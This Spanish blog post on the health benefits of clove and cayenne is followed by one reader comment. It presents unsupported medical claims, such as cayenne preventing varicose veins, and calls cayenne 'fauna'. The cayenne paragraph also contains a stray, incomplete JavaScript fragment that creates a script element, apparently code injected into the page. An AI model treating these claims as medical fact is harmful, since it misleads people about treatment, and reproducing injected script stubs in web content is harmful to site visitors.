Salud y belleza » Alimentación, Medicina

Especias especiales (II)

1 Comentario

Continuamos con el repaso (ver nota anterior sobre especias especiales) en torno a algunas de las especias más beneficiosas para el organismo humano. Un grupo de herramientas que no solo sirven en la cocina, para dar sabor, sino también en el organismo, para dar salud…

Aquí la segunda parte del análisis con más especias…

Clavo.

Es el clavo de olor, tal vez la especia más conocida de todo el repaso. Se utiliza como ingrediente para muchas cocinas y, también, como forma de pelear contra el mal alimento (algo que ya hemos visto con el cardamomo). El clavo de olor, a su vez, es considerado como un elemento natural indispensable al momento de pelear contra ciertos trastornos relacionados con el aparato digestivo y respiratorio. Los chinos solía emplearlo para casi todo.

Cayena.

La pimienta de cayena es un producto de la rica fauna americana. Está considerada como una de las especias más picantes de entre todas. Pero no solo eso: su valor curativo es otra cosa para destacar. La famosa pimienta de cayena estimula la salivación, evita la flatulencia, mejora la circulación sanguínea y previene el surgimiento de las varices.var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : ,

One Comment »

  • ana said:

    mi marido en casa es un fanatico de las especies, la gran mayoria de veces como es un manitas se mete en la cocina a soltar su creatividad y la verdad esque en casa tenemos de todo, ademas de condimento para la comida , es las utilzia como remedios caseros para catarros, inflamaciones, problemas cutaneos, etc…. la verdad que tengo mi chumari!!!! particular.

    saludos a todos
    buen findeeeeeeeee

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.